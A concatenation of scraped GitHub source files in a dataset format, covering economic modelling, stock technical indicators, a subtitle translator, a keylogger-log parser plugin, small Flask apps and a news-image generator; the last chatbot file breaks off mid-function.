self.__str__()\n\n def __str__(self):\n m = \"\"\"\\\n Linear Gaussian state space model:\n - dimension of state space : {n}\n - number of innovations : {m}\n - dimension of observation equation : {k}\n \"\"\"\n return dedent(m.format(n=self.n, k=self.k, m=self.m))\n\n def convert(self, x):\n \"\"\"\n Convert array_like objects (lists of lists, floats, etc.) into\n well formed 2D NumPy arrays\n\n \"\"\"\n return np.atleast_2d(np.asarray(x, dtype='float'))\n\n def simulate(self, ts_length=100, random_state=None):\n r\"\"\"\n Simulate a time series of length ts_length, first drawing\n\n .. math::\n\n x_0 \\sim N(\\mu_0, \\Sigma_0)\n\n Parameters\n ----------\n ts_length : scalar(int), optional(default=100)\n The length of the simulation\n random_state : int or np.random.RandomState, optional\n Random seed (integer) or np.random.RandomState instance to set\n the initial state of the random number generator for\n reproducibility. If None, a randomly initialized RandomState is\n used.\n\n Returns\n -------\n x : array_like(float)\n An n x ts_length array, where the t-th column is :math:`x_t`\n y : array_like(float)\n A k x ts_length array, where the t-th column is :math:`y_t`\n\n \"\"\"\n random_state = check_random_state(random_state)\n\n x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0)\n w = random_state.randn(self.m, ts_length-1)\n v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t\n # == simulate time series == #\n x = simulate_linear_model(self.A, x0, v, ts_length)\n\n if self.H is not None:\n v = random_state.randn(self.l, ts_length)\n y = self.G.dot(x) + self.H.dot(v)\n else:\n y = self.G.dot(x)\n\n return x, y\n\n def replicate(self, T=10, num_reps=100, random_state=None):\n r\"\"\"\n Simulate num_reps observations of :math:`x_T` and :math:`y_T` given\n :math:`x_0 \\sim N(\\mu_0, \\Sigma_0)`.\n\n Parameters\n ----------\n T : scalar(int), optional(default=10)\n The period that we want to replicate values for\n num_reps : scalar(int), optional(default=100)\n The number of replications that we want\n random_state : int or np.random.RandomState, optional\n Random seed (integer) or np.random.RandomState instance to set\n the initial state of the random number generator for\n reproducibility. If None, a randomly initialized RandomState is\n used.\n\n Returns\n -------\n x : array_like(float)\n An n x num_reps array, where the j-th column is the j_th\n observation of :math:`x_T`\n\n y : array_like(float)\n A k x num_reps array, where the j-th column is the j_th\n observation of :math:`y_T`\n\n \"\"\"\n random_state = check_random_state(random_state)\n\n x = np.empty((self.n, num_reps))\n for j in range(num_reps):\n x_T, _ = self.simulate(ts_length=T+1, random_state=random_state)\n x[:, j] = x_T[:, -1]\n if self.H is not None:\n v = random_state.randn(self.l, num_reps)\n y = self.G.dot(x) + self.H.dot(v)\n else:\n y = self.G.dot(x)\n\n return x, y\n\n def moment_sequence(self):\n r\"\"\"\n Create a generator to calculate the population mean and\n variance-convariance matrix for both :math:`x_t` and :math:`y_t`\n starting at the initial condition (self.mu_0, self.Sigma_0).\n Each iteration produces a 4-tuple of items (mu_x, mu_y, Sigma_x,\n Sigma_y) for the next period.\n\n Yields\n ------\n mu_x : array_like(float)\n An n x 1 array representing the population mean of x_t\n mu_y : array_like(float)\n A k x 1 array representing the population mean of y_t\n Sigma_x : array_like(float)\n An n x n array representing the variance-covariance matrix\n of x_t\n Sigma_y : array_like(float)\n A k x k array representing the variance-covariance matrix\n of y_t\n\n \"\"\"\n # == Simplify names == #\n A, C, G, H = self.A, self.C, self.G, self.H\n # == Initial moments == #\n mu_x, Sigma_x = self.mu_0, self.Sigma_0\n\n while 1:\n mu_y = G.dot(mu_x)\n if H is None:\n Sigma_y = G.dot(Sigma_x).dot(G.T)\n else:\n Sigma_y = G.dot(Sigma_x).dot(G.T) + H.dot(H.T)\n\n yield mu_x, mu_y, Sigma_x, Sigma_y\n\n # == Update moments of x == #\n mu_x = A.dot(mu_x)\n Sigma_x = A.dot(Sigma_x).dot(A.T) + C.dot(C.T)\n\n def stationary_distributions(self, max_iter=200, tol=1e-5):\n r\"\"\"\n Compute the moments of the stationary distributions of :math:`x_t` and\n :math:`y_t` if possible. Computation is by iteration, starting from\n the initial conditions self.mu_0 and self.Sigma_0\n\n Parameters\n ----------\n max_iter : scalar(int), optional(default=200)\n The maximum number of iterations allowed\n tol : scalar(float), optional(default=1e-5)\n The tolerance level that one wishes to achieve\n\n Returns\n -------\n mu_x_star : array_like(float)\n An n x 1 array representing the stationary mean of :math:`x_t`\n mu_y_star : array_like(float)\n An k x 1 array representing the stationary mean of :math:`y_t`\n Sigma_x_star : array_like(float)\n An n x n array representing the stationary var-cov matrix\n of :math:`x_t`\n Sigma_y_star : array_like(float)\n An k x k array representing the stationary var-cov matrix\n of :math:`y_t`\n\n \"\"\"\n # == Initialize iteration == #\n m = self.moment_sequence()\n mu_x, mu_y, Sigma_x, Sigma_y = next(m)\n i = 0\n error = tol + 1\n\n # == Loop until convergence or failure == #\n while error > tol:\n\n if i > max_iter:\n fail_message = 'Convergence failed after {} iterations'\n raise ValueError(fail_message.format(max_iter))\n\n else:\n i += 1\n mu_x1, mu_y1, Sigma_x1, Sigma_y1 = next(m)\n error_mu = np.max(np.abs(mu_x1 - mu_x))\n error_Sigma = np.max(np.abs(Sigma_x1 - Sigma_x))\n error = max(error_mu, error_Sigma)\n mu_x, Sigma_x = mu_x1, Sigma_x1\n\n # == Prepare return values == #\n mu_x_star, Sigma_x_star = mu_x, Sigma_x\n mu_y_star, Sigma_y_star = mu_y1, Sigma_y1\n\n return mu_x_star, mu_y_star, Sigma_x_star, Sigma_y_star\n\n def geometric_sums(self, beta, x_t):\n r\"\"\"\n Forecast the geometric sums\n\n .. math::\n\n S_x := E \\Big[ \\sum_{j=0}^{\\infty} \\beta^j x_{t+j} | x_t \\Big]\n\n S_y := E \\Big[ \\sum_{j=0}^{\\infty} \\beta^j y_{t+j} | x_t \\Big]\n\n Parameters\n ----------\n beta : scalar(float)\n Discount factor, in [0, 1)\n\n beta : array_like(float)\n The term x_t for conditioning\n\n Returns\n -------\n S_x : array_like(float)\n Geometric sum as defined above\n\n S_y : array_like(float)\n Geometric sum as defined above\n\n \"\"\"\n\n I = np.identity(self.n)\n S_x = solve(I - beta * self.A, x_t)\n S_y = self.G.dot(S_x)\n\n return S_x, S_y\n\n def impulse_response(self, j=5):\n r\"\"\"\n Pulls off the imuplse response coefficients to a shock\n in :math:`w_{t}` for :math:`x` and :math:`y`\n\n Important to note: We are uninterested in the shocks to\n v for this method\n\n * :math:`x` coefficients are :math:`C, AC, A^2 C...`\n * :math:`y` coefficients are :math:`GC, GAC, GA^2C...`\n\n Parameters\n ----------\n j : Scalar(int)\n Number of coefficients that we want\n\n Returns\n -------\n xcoef : list(array_like(float, 2))\n The coefficients for x\n ycoef : list(array_like(float, 2))\n The coefficients for y\n \"\"\"\n # Pull out matrices\n A, C, G, H = self.A, self.C, self.G, self.H\n Apower = np.copy(A)\n\n # Create room for coefficients\n xcoef = [C]\n ycoef = [np.dot(G, C)]\n\n for i in range(j):\n xcoef.append(np.dot(Apower, C))\n ycoef.append(np.dot(G, np.dot(Apower, C)))\n Apower = np.dot(Apower, A)\n\n return xcoef, ycoef\n","repo_name":"pmnyc/Source_Codes_Collected","sub_path":"QuantEconpy_quantitative economic modeling/quantecon/lss.py","file_name":"lss.py","file_ext":"py","file_size_in_byte":13108,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"8"} +{"seq_id":"39923349316","text":"\nimport pandas as pd\nimport sqlite3 as sql\nimport sys\nsys.path.append('/Users/yunongwu/Documents/Portfolio_Intelligence/Code/')\nconn = sql.connect('/Users/yunongwu/Nustore Files/PI/data/data.db')\nc = conn.cursor()\nc.execute(\"select * from stocks_price\")\n\nprice = pd.DataFrame(c.fetchall())\nprice.columns =['Date','Open','Close','High','Low','Volume','Code']\n# a=price.loc[(price['Code']=='000517')|(price['Code']=='600399')]\nb=price.sort_values(by=['Code','Date'])\nb['Date'] = pd.DatetimeIndex(b['Date'])\nb = b.set_index('Date')\n\ndef rsi6(ClosePrice,n=6):\n ClosePrice = pd.DataFrame(ClosePrice)\n change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n up, down=change.copy(),change.copy()\n up[up<0]=0\n down[down>0]=0\n RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n RS=RolUp/RolDown\n rsi=100-(100/(1+RS))\n return round(rsi,2)\n\nrsi6=b.groupby('Code')[['Close']].apply(rsi6).reset_index()\nrsi6=rsi6.rename(columns={'Close':'RSI6'})\n\ndef rsi12(ClosePrice,n=12):\n ClosePrice = pd.DataFrame(ClosePrice)\n change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n up, down=change.copy(),change.copy()\n up[up<0]=0\n down[down>0]=0\n RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n RS=RolUp/RolDown\n rsi=100-(100/(1+RS))\n return round(rsi,2)\n\nrsi12=b.groupby('Code')[['Close']].apply(rsi12).reset_index()\nrsi12=rsi12.rename(columns={'Close':'RSI12'})\n\ndef rsi24(ClosePrice,n=24):\n ClosePrice = pd.DataFrame(ClosePrice)\n change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n up, down=change.copy(),change.copy()\n up[up<0]=0\n down[down>0]=0\n RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n RS=RolUp/RolDown\n rsi=100-(100/(1+RS))\n return round(rsi,2)\n\nrsi24=b.groupby('Code')[['Close']].apply(rsi24).reset_index()\nrsi24=rsi24.rename(columns={'Close':'RSI24'})\n\n#Simple Moving Average\ndef sma5(ClosePrice,n=5):\n ClosePrice=pd.DataFrame(ClosePrice)\n ma=ClosePrice.copy()\n ma5=ma.rolling(window=n,center=False).mean()\n return round(ma5,2)\n\nsma5=b.groupby('Code')[['Close']].apply(sma5).reset_index()\nsma5=sma5.rename(columns={'Close':'SMA5'})\n\ndef sma10(ClosePrice,n=10):\n ClosePrice=pd.DataFrame(ClosePrice)\n ma=ClosePrice.copy()\n ma10=ma.rolling(window=n,center=False).mean()\n return round(ma10,2)\n\nsma10=b.groupby('Code')[['Close']].apply(sma10).reset_index()\nsma10=sma10.rename(columns={'Close':'SMA10'})\n\ndef sma20(ClosePrice,n=20):\n ClosePrice=pd.DataFrame(ClosePrice)\n ma=ClosePrice.copy()\n ma20=ma.rolling(window=n,center=False).mean()\n return round(ma20,2)\n\nsma20=b.groupby('Code')[['Close']].apply(sma20).reset_index()\nsma20=sma20.rename(columns={'Close':'SMA20'})\n\ndef sma30(ClosePrice,n=30):\n ClosePrice=pd.DataFrame(ClosePrice)\n ma=ClosePrice.copy()\n ma30=ma.rolling(window=n,center=False).mean()\n return round(ma30,2)\n\nsma30=b.groupby('Code')[['Close']].apply(sma30).reset_index()\nsma30=sma30.rename(columns={'Close':'SMA30'})\n\ndef sma60(ClosePrice,n=30):\n ClosePrice=pd.DataFrame(ClosePrice)\n ma=ClosePrice.copy()\n ma60=ma.rolling(window=n,center=False).mean()\n return round(ma60,2)\n\nsma60=b.groupby('Code')[['Close']].apply(sma60).reset_index()\nsma60=sma60.rename(columns={'Close':'SMA60'})\n\n#High/Low\ndef pre20high(ClosePrice,n=20):\n ClosePrice=pd.DataFrame(ClosePrice)\n pre=ClosePrice.copy()\n pre20high=pre.rolling(window=n).max()\n return round(pre20high,2)\n\npre20high=b.groupby('Code')[['Close']].apply(pre20high).reset_index()\npre20high=pre20high.rename(columns={'Close':'20HIGH'})\n\ndef pre20low(ClosePrice,n=20):\n ClosePrice=pd.DataFrame(ClosePrice)\n pre=ClosePrice.copy()\n pre20low=pre.rolling(window=n).min()\n return round(pre20low,2)\n\npre20low=b.groupby('Code')[['Close']].apply(pre20low).reset_index()\npre20low=pre20low.rename(columns={'Close':'20LOW'})\n\ndef pre50high(ClosePrice,n=50):\n ClosePrice=pd.DataFrame(ClosePrice)\n pre=ClosePrice.copy()\n pre50high=pre.rolling(window=n).max()\n return round(pre50high,2)\n\npre50high=b.groupby('Code')[['Close']].apply(pre50high).reset_index()\npre50high=pre50high.rename(columns={'Close':'50HIGH'})\n\ndef pre50low(ClosePrice,n=50):\n ClosePrice=pd.DataFrame(ClosePrice)\n pre=ClosePrice.copy()\n pre50low=pre.rolling(window=n).min()\n return round(pre50low,2)\n\npre50low=b.groupby('Code')[['Close']].apply(pre50low).reset_index()\npre50low=pre50low.rename(columns={'Close':'50LOW'})\n\n#Gap\ndef gap(ClosePrice):\n ClosePrice = pd.DataFrame(ClosePrice)\n gap = ClosePrice['Open']-ClosePrice['Close'].shift(1) \n gap = pd.DataFrame({'GAP':gap})\n gap = gap.copy() \n return round(gap,2)\ngap=b.groupby('Code').apply(gap).reset_index()\n\n#Close Price Change\ndef closechange(ClosePrice):\n ClosePrice = pd.DataFrame(ClosePrice)\n change = ClosePrice['Close']-ClosePrice['Close'].shift(1) \n change = pd.DataFrame({'CloseChange':change})\n change = change.copy() \n return round(change,2)\nclosechange=b.groupby('Code').apply(closechange).reset_index()\n\n#Change from Open\ndef changefromopen(ClosePrice):\n ClosePrice = pd.DataFrame(ClosePrice)\n change = ClosePrice['Close']-ClosePrice['Open']\n change = pd.DataFrame({'ChangeFromOpen':change})\n change = change.copy() \n return round(change,2)\nchangefromopen=b.groupby('Code').apply(changefromopen).reset_index()\n\n#Amplitude\ndef amplitude(ClosePrice):\n ClosePrice = pd.DataFrame(ClosePrice)\n amplitude = round(100*(ClosePrice['High']-ClosePrice['Low'])/ClosePrice['Close'].shift(1),4)\n amplitude = pd.DataFrame({'Amplitude%':amplitude})\n amplitude = amplitude.copy()\n return amplitude\n\namplitude=b.groupby('Code').apply(amplitude).reset_index()\n\n#HighLowRange\ndef HighLowRange(ClosePrice):\n ClosePrice = pd.DataFrame(ClosePrice)\n ClosePrice['Close_Shift'] = ClosePrice.groupby('Code').shift(1)['Close']\n ClosePrice['High_Range%'] = 100*round((ClosePrice['Close_Shift']-ClosePrice['High']).abs()/ClosePrice['Close_Shift'],4)\n ClosePrice['Low_Range%'] = 100*round((ClosePrice['Close_Shift']-ClosePrice['Low']).abs()/ClosePrice['Close_Shift'],4) \n return ClosePrice[['Code', 'High_Range%', 'Low_Range%']]\n\nhighlowrange=HighLowRange(b).reset_index()\n\nhighlowrange.loc[(highlowrange['High_Range%'] > 11) | highlowrange['Low_Range%']>11]\n\n#MACD\ndef MACD(ClosePrice, nslow=26, nfast=12, nma=9):\n ClosePrice = pd.DataFrame(ClosePrice) \n emaslow = ClosePrice[\"Close\"].ewm(ignore_na=False,span=nslow, min_periods=0,adjust=True).mean()\n emafast = ClosePrice[\"Close\"].ewm(ignore_na=False,span=nfast, min_periods=0,adjust=True).mean()\n diff = emafast - emaslow\n dea = diff.ewm(ignore_na=False,span=nma, min_periods=0,adjust=True).mean()\n macd = 2*(diff - dea)\n result = pd.DataFrame({'MACD_DIFF': round(emafast-emaslow,2),'MACD_DEA':round(dea,2),'MACD':round(macd,2)})\n result = result.copy()\n return result\n\nMACD=b.groupby('Code')[['Close']].apply(MACD).reset_index()\n\n\ndfs = [rsi6,rsi12,rsi24,sma5,sma10,sma20,sma30,sma60,pre20high,pre20low,pre50high,pre50low,gap,closechange,changefromopen,amplitude,highlowrange,MACD]\nfrom functools import reduce\ndf_final = reduce(lambda left,right: pd.merge(left,right,on=['Code','Date']), dfs)\n\ndf_final.to_sql(con=conn, name='technical', if_exists='replace')\nconn.commit()\n\nconn.close()","repo_name":"grassriver/Zhidao","sub_path":"tec index.py","file_name":"tec index.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"33942868596","text":"from mtranslate import translate\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QListWidgetItem, QTableWidgetItem, QFontDialog\nfrom PyQt5.QtCore import QTimer, Qt\nfrom PyQt5.QtGui import QFont\nfrom template import Ui_MainWindow\nfrom srtparse import get_subtitles\n\nclass SubLearn(QMainWindow):\n def __init__(self):\n super(SubLearn, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.app_variable()\n self.bind_signal()\n\n def app_variable(self):\n self.timer = QTimer()\n self.timer.setInterval(1000)\n self.font = QFont(\"Arial\", 15)\n \n def bind_signal(self):\n self.ui.open_button.clicked.connect(self.open_file)\n self.ui.font_button.clicked.connect(self.set_font)\n self.ui.next_button.clicked.connect(self.next_item)\n self.ui.previous_button.clicked.connect(self.previous_item)\n self.ui.tableSub.itemSelectionChanged.connect(self.select_subtitle)\n self.ui.listWord.itemSelectionChanged.connect(self.update_lineEdit)\n self.ui.listSentences.itemSelectionChanged.connect(self.update_lineEdit_Sentences)\n self.ui.hold_word_lineEdit.textChanged.connect(self.timer_update)\n self.timer.timeout.connect(self.translate_and_write)\n \n def open_file(self):\n filedialog = QFileDialog()\n filedialog.setFileMode(QFileDialog.AnyFile)\n url = filedialog.getOpenFileName(filter=(\"*.srt\"))[0]\n self.add_item_tableSub(url) if url != \"\" else \"\"\n del filedialog\n \n def set_font(self):\n fontdialog = QFontDialog()\n fontdialog.exec()\n font = fontdialog.selectedFont()\n self.font = font\n self.update_font()\n return font\n \n def update_font(self):\n all_table_items = self.ui.tableSub.findItems(\"\", Qt.MatchContains)\n for i in all_table_items: i.setFont(self.font)\n\n def next_item(self):\n try:\n selected_row = self.ui.tableSub.currentRow()\n self.ui.tableSub.setCurrentCell(selected_row + 1, 0)\n except AttributeError:\n pass\n\n def previous_item(self):\n try:\n selected_row = self.ui.tableSub.currentRow()\n self.ui.tableSub.setCurrentCell(selected_row - 1, 0)\n except AttributeError:\n pass\n \n def add_item_tableSub(self, file):\n self.ui.tableSub.setRowCount(0)\n sublist = get_subtitles(file)\n for i in sublist:\n rowPosition = self.ui.tableSub.rowCount()\n self.ui.tableSub.insertRow(rowPosition)\n item = QTableWidgetItem(i.content)\n item.setFont(self.font)\n self.ui.tableSub.setItem(rowPosition, 0, item)\n self.ui.tableSub.resizeRowsToContents()\n \n def select_subtitle(self):\n try:\n text = self.ui.tableSub.currentItem().text()\n self.update_listWord(text)\n except AttributeError:\n pass\n \n def select_sentences(self, item):\n text = item.text()\n self.ui.hold_word_lineEdit.setText(text)\n \n def update_listWord(self, text):\n self.ui.listWord.clear()\n self.ui.listSentences.clear()\n word_list = []\n sentences = text.split(\"\\n\")\n for i in sentences:\n for word in i.split(\" \"):\n word_list.append(word)\n for i in word_list:\n word_item = QListWidgetItem()\n word_item.setFont(self.font)\n word_item.setText(i)\n self.ui.listWord.addItem(word_item)\n for i in sentences:\n sentences_item = QListWidgetItem()\n sentences_item.setFont(self.font)\n sentences_item.setText(i)\n self.ui.listSentences.addItem(sentences_item)\n \n def update_lineEdit(self):\n text = \"\"\n for i in self.ui.listWord.selectedItems():\n text += (\" \" + i.text())\n \n self.ui.hold_word_lineEdit.setFont(self.font)\n self.ui.hold_word_lineEdit.setText(text.strip())\n \n def update_lineEdit_Sentences(self):\n text = \"\"\n for i in self.ui.listSentences.selectedItems():\n text += (\" \" + i.text())\n \n self.ui.hold_word_lineEdit.setFont(self.font)\n self.ui.hold_word_lineEdit.setText(text.strip())\n\n def timer_update(self, text):\n self.timer.stop()\n self.ui.translateArea.setPlainText(\"Please wait...\")\n self.timer.start()\n\n def translate_and_write(self):\n self.timer.stop()\n text = self.ui.hold_word_lineEdit.text()\n trans_text = translate(text, \"tr\", \"auto\")\n self.ui.translateArea.setFont(self.font)\n self.ui.translateArea.setPlainText(trans_text)\n\nif __name__ == \"__main__\":\n app = QApplication([])\n window = SubLearn()\n window.show()\n app.exec()","repo_name":"acarokan/SubLearn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"21549202006","text":"import os\nimport subprocess\n\nfrom engine.parser import Parser\n\n\nclass PyKeyloggerParser(Parser):\n\n def __init__(self, collector):\n super(PyKeyloggerParser, self).__init__(collector)\n self.click_dir = os.path.join(self.file_or_dir, \"click_images\")\n self.timed_dir = os.path.join(self.file_or_dir, \"timed_screenshots\")\n self.file_or_dir = os.path.join(self.file_or_dir, \"detailed_log\", \"logfile.txt\")\n if os.name == 'nt':\n self.script_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"keylogger_parser.bat\")\n else:\n self.script_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"keylogger_parser.sh\")\n self.parserInputs = [self.script_file, self.file_or_dir, self.parsed_folder, self.click_dir, self.timed_dir]\n\n","repo_name":"ARL-UTEP-OC/ecel","sub_path":"plugins/parsers/pykeylogger/pykeylogger_parser.py","file_name":"pykeylogger_parser.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"8"} +{"seq_id":"35789123197","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/report')\ndef report():\n #To get the args passed in our html form\n # The 3 conditions to check (start as False)\n has_upper = False\n has_lower = False\n has_num = False\n name = request.args.get('name')\n\n has_lower = any(letter.islower() for letter in name)\n has_upper = any(letter.isupper() for letter in name)\n has_num = name[-1].isdigit()\n # Check if all are True.\n report = has_upper and has_lower and has_num\n\n return render_template('report.html', name = name,has_upper = has_upper,has_lower = has_lower, has_num = has_num,report = report)\n\n\n\n\nif __name__=='__main__':\n app.run(debug=True)","repo_name":"NyakioMuriuki/Flask_Projects","sub_path":"username_authenticator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4584819224","text":"from PIL import Image,ImageFont, ImageDraw\nimport textwrap\nimport os \nimport shutil\n\ndata_directory = \"news_data\"\nimg_directory = \"image_data\"\n\nif os.path.exists(img_directory):\n\tshutil.rmtree(img_directory)\n\n#Recreating the Directory.\nos.mkdir(img_directory)\n\nnews_data = []\nnews_title = []\n\n#Function to Append the Data from File to the Array Placeholders.\ndef append_data_onto_array(data_file, title_files):\n\twith open(data_file, \"r\")as r:\n\t\tfor lines in r.read().split(\"\\n\"):\n\t\t\tnews_data.append(lines)\n\n\twith open(title_files, \"r\")as r:\n\t\tfor lines in r.read().split(\"\\n\"):\n\t\t\tnews_title.append(lines)\n\nappend_data_onto_array(data_file=f\"{data_directory}/news.txt\", title_files=f\"{data_directory}/titles.txt\")\n#Removing the Last Element from the Array.\ndel news_data[-1], news_title[-1]\n\ndef image_writer(text_data, text_title):\n\tglobal news_data, news_title\n\tfont_type_title = ImageFont.truetype(\"OpenSans-LightItalic.ttf\",45)\n\t#image = Image.open(\"carbon.png\")\n\tfont_type = ImageFont.truetype(\"OpenSans-Light.ttf\",45)\n\n\tfor news_datas,data_s in enumerate(news_data):\n\t\tfor news_titles, data_t in enumerate(news_title):\n\n\t\t\timage = Image.open(\"carbon.png\")\n\t\t\tdraw = ImageDraw.Draw(image)\n\n\t\t\ttext = textwrap.fill(data_s,width=55)\n\n\t\t\tw,h = font_type.getsize(text)\n\t\t\tdraw.text(xy=(650,100), text=data_t, font=font_type_title)\n\t\t\tdraw.text(xy=(200,200),text=text,fill=(0,171,169),font=font_type)\n\t\t\timage.save(f\"{img_directory}/image_{news_datas}.png\")\n\nimage_writer(text_data=news_data, text_title=news_title)\n\n","repo_name":"harsath/Byte-News--A-Twitter-News-bot-from-The-Hindu-API","sub_path":"image_create.py","file_name":"image_create.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"37064581410","text":"def Dyn_Curr(CurrFrom, CurrTo):\r\n\r\n\t#Web Crawling\r\n\timport urllib2\r\n\tsURL ='https://www.google.com/finance/converter?a=1&from=' + CurrFrom + '&to=' + CurrTo\r\n\thtml = urllib2.urlopen(sURL)\r\n\tByteData = html.read()\r\n\t\r\n\t#Crawled data as 1D array of string\r\n\tStrData = ByteData.decode(\"ISO-8859-1\").strip().split('\\n')\r\n\t\r\n\t#Extract Currency from the string array\r\n\tNumLine = len(StrData)\r\n\tfor i in range(0,NumLine):\r\n \t\tif StrData[i][0:34] == '
':\r\n \t\tLineCurrency=StrData[i]\r\n\r\n\tPosStartText = ''\r\n\tPosEndText = ''\r\n\tLenPosStart = len(PosStartText)\r\n\tLenPosEnd = len(PosEndText)\r\n\tPosStart =(LineCurrency.find(PosStartText) + LenPosStart) - len(LineCurrency)\r\n\tPosEnd = LineCurrency.find(PosEndText)-4\r\n\tCurr = LineCurrency[PosStart:PosEnd]\r\n\tCurr = float(Curr)\r\n\treturn Curr","repo_name":"funkyong13/PlotTrend","sub_path":"PT_PythonBackEnd/Feature1_Historical Date Crawl/Final/Def_Dynamic_Currency.py","file_name":"Def_Dynamic_Currency.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"33119583504","text":"import os\n\nfrom iota2.Steps import IOTA2Step\nfrom iota2.Cluster import get_RAM\nfrom iota2.Common import ServiceConfigFile as SCF\n\n\nclass slicSegmentation(IOTA2Step.Step):\n def __init__(self, cfg, cfg_resources_file, workingDirectory=None):\n # heritage init\n resources_block_name = \"slic_segmentation\"\n super(slicSegmentation, self).__init__(cfg, cfg_resources_file,\n resources_block_name)\n\n # step variables\n self.RAM = 1024.0 * get_RAM(self.resources[\"ram\"])\n self.workingDirectory = workingDirectory\n\n def step_description(self):\n \"\"\"\n function use to print a short description of the step's purpose\n \"\"\"\n description = (\"Compute SLIC segmentation by tile\")\n #~ About SLIC segmentation implementation :\n #~ https://ieeexplore.ieee.org/document/8606448\n return description\n\n def step_inputs(self):\n \"\"\"\n Return\n ------\n the return could be and iterable or a callable\n \"\"\"\n tiles = SCF.serviceConfigFile(self.cfg).getParam('chain',\n 'listTile').split(\" \")\n return tiles\n\n def step_execute(self):\n \"\"\"\n Return\n ------\n lambda\n the function to execute as a lambda function. The returned object\n must be a lambda function.\n \"\"\"\n from iota2.Segmentation import segmentation\n from iota2.Common.ServiceConfigFile import iota2_parameters\n\n running_parameters = iota2_parameters(self.cfg)\n\n step_function = lambda x: segmentation.slicSegmentation(\n x,\n SCF.serviceConfigFile(self.cfg).getParam('chain', 'outputPath'),\n running_parameters.get_sensors_parameters(x), self.RAM, self.\n workingDirectory)\n return step_function\n\n def step_outputs(self):\n \"\"\"\n \"\"\"\n pass\n","repo_name":"inglada/iota2","sub_path":"iota2/Steps/slicSegmentation.py","file_name":"slicSegmentation.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"42465372423","text":"''' \nThe Chatbot\n\nauthor: Sawyer\n'''\n\nfrom flask import Flask\nfrom flask import render_template, redirect, request\nimport ast\nimport random\n\nconversation = {}\n\napp = Flask(__name__)\n\n@app.route('/', methods = ['POST', 'GET'])\ndef pick_nickname_and_password():\n\treturn render_template('pick_nickname.html')\n\n@app.route('/redirect', methods = ['POST', 'GET'])\ndef get_nickname_and_redirect():\n\tnickname = str(request.form['nickname'])\n\tpassword = str(request.form['password'])\n\tif check_password(nickname, password):\n\t\turl = '/converse/'+nickname\n\t\treturn redirect(url)\n\treturn redirect('/')\n\n@app.route('/converse/', methods = ['POST', 'GET'])\ndef index(nickname):\n\tresponses = []\n\tif nickname in conversation:\n\t\tresponses = conversation[nickname]\n\treturn render_template('main.html', nickname=nickname, responses=responses)\n\n@app.route('/respond/', methods = ['POST', 'GET'])\ndef respond(nickname):\n\ttry:\n\t\tsearch = str(request.form['searchkey'])\n\t\ttext = take_input(search, nickname)\n\texcept:\n\t\tpass\n\turl = '/converse/'+nickname\n\treturn redirect(url)\n\n@app.route('/add_response//', methods = ['POST', 'GET'])\ndef add_response_from_user(nickname, post):\n\tvalue = str(request.form['suggestion'])\n\tadd_entry(str(post), value)\n\tremove_from_unresponded(post)\n\turl = '/converse/'+nickname\n\treturn redirect(url)\n\n@app.route('/logout/', methods = ['POST', 'GET'])\ndef logout(nickname):\n\tclear_conversation(nickname)\n\treturn redirect('/')\n\n@app.route('/make_responses', methods = ['POST', 'GET'])\ndef suggest_responses():\n\tunanswered = make_unresponded_list()\n\treturn render_template('help.html', unanswered=unanswered)\n\n@app.route('/alternate_help/', methods = ['POST', 'GET'])\ndef add_alternate_help(post):\n\tadd_to_unresponded_alternate(post)\n\turl = '/make_responses'\n\treturn redirect(url)\n\n@app.route('/add_response_help/', methods = ['POST', 'GET'])\ndef add_response_help(post):\n\tvalue = str(request.form['suggestion'])\n\tadd_entry(str(post), value)\n\tremove_from_unresponded(post)\n\turl = '/make_responses'\n\treturn redirect(url)\n\ndef check_password(user, password):\n\tf = open('users.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\tif user not in y:\n\t\tadd_user(user, password)\n\t\treturn True\n\tif y[user] == password:\n\t\treturn True\n\treturn False\n\ndef add_user(user, password):\n\tf = open('users.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\ty[user] = password\n\tz = str(y)\n\tnew_file = open('users.txt', 'w')\n\tnew_file.write(z)\n\tnew_file.close()\n\ndef add_entry(key, value):\n\tf = open('responses.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\tif key not in y:\n\t\ty[key] = []\n\tif value not in y[key]:\n\t\ty[key].append(value)\n\tz = str(y)\n\tnew_file = 